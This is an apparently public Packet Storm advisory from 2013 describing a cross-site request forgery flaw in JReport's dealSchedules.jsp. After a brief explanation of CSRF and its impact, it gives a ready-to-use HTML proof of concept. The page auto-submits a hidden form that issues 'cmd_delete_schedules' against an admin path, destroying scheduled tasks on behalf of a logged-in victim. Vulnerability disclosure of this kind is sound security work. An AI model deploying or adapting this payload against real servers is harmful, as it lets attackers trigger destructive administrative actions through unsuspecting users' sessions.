JReport Cross Site Request Forgery

2013-10-25T00:00:00
ID PACKETSTORM:123772
Type packetstorm
Reporter asheesh anaconda
Modified 2013-10-25T00:00:00

Description

                                        
                                            `================================================================================================================================================================  
  
JREPORT Cross Site Request Forgery Vulnerability  
================================================================================================================================================================  
  
  
#Date- 24/10/2013  
  
# Author Asheesh kumar Mani Tripathi  
  
Asheesh Anaconda  
  
  
  
# Vulnerbaility Discoverd By :Poonam Singh  
  
  
  
#Vulnerbility  
JREPORT is prone to an Cross Site Request Forgery Vulnerability (CSRF) Vulnerability   
  
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF,  
is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.  
  
#Impact  
An attacker may force the users of a web application to execute actions of the attacker's choosing.  
A successful CSRF exploit can compromise end user data and operation in case of normal user.  
If the targeted end user is the administrator account, this can compromise the entire web application.  
  
  
  
<html>  
<body>  
<form name="foo" action="https://172.28.1.1/jreport/jinfonet/dealSchedules.jsp"method="post">  
<input type=hidden name="d1" value="2013-08-03%252014%253a20%253a41.29">  
<input type=hidden name="cmd" value="cmd_delete_schedules">  
<input type=hidden name="taskClass" value="APIDemoDynamicExportTask">  
<input type=hidden name="taskUrl" value="schedulePage.jsp%3Fjrs.cmd%3Djrs.get_edit_schd_page%26jrs.task_id%3D2013-08-03%252014%253a20%253a41.29%26jrs.catalog%3D%252fSecurity%252fSecurity.cat%26jrs.report%3D%252fSecurity%252fBank_User%2520Activation.cls%26jrs.path%3D%2FUSERFOLDERPATH%2Fadmin">  
<input type=hidden name="jrs.path" value="%2FUSERFOLDERPATH%2Fadmin">  
</form>  
<script>  
document.foo.submit();  
</script>  
</body>  
</html>  
`